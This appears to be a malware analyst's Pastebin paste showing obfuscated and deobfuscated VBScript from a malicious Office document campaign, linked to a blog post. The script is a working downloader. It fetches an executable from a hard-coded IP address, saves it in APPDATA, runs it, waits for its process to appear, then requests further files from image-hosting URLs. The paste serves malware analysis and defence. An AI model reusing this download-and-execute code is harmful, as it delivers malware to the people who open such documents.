Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
- Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
- <== obfuscated: ===>
- dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
- HGyu87f7Usf.Send
- Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
- iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
- iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
- with oUIOGuiwefff
- .type = 1
- .open
- .write HGyu87f7Usf.responseBody
- .savetofile iyUGUIvbuiwe7vhJ, 2
- end with
- Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
- uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
- dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
- JHyygUBjdfg.Send
- Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
- Do
- Running = False
- Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
- For Each objItem In colItems
- If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101) Then
- Running = True
- Exit For
- End If
- Next
- If Not Running Then
- WScript.Sleep 3000
- End If
- Loop While Not Running
- dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
- sdfsdfsdf.Send
- =========================================================================================================
- <== deobfuscated: ===>
- dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
- dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
- HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
- HGyu87f7Usf.Send
- Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
- iyUGbuwerff = dfgfderer(APPDATA )
- iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
- with oUIOGuiwefff
- .type = 1
- .open
- .write HGyu87f7Usf.responseBody
- .savetofile iyUGUIvbuiwe7vhJ, 2
- end with
- Set uyGUYhi8wef = CreateObject(Shell.Application )
- uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
- dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
- dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
- JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
- JHyygUBjdfg.Send
- Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
- Do
- Running = Falsepasteb
- Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
- For Each objItem In colItems
- If objItem.Name = o8237423.exe Then
- Running = True
- Exit For
- End If
- Next
- If Not Running Then
- WScript.Sleep 3000
- End If
- Loop While Not Running
- dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
- dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
- sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
- sdfsdfsdf.Send
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement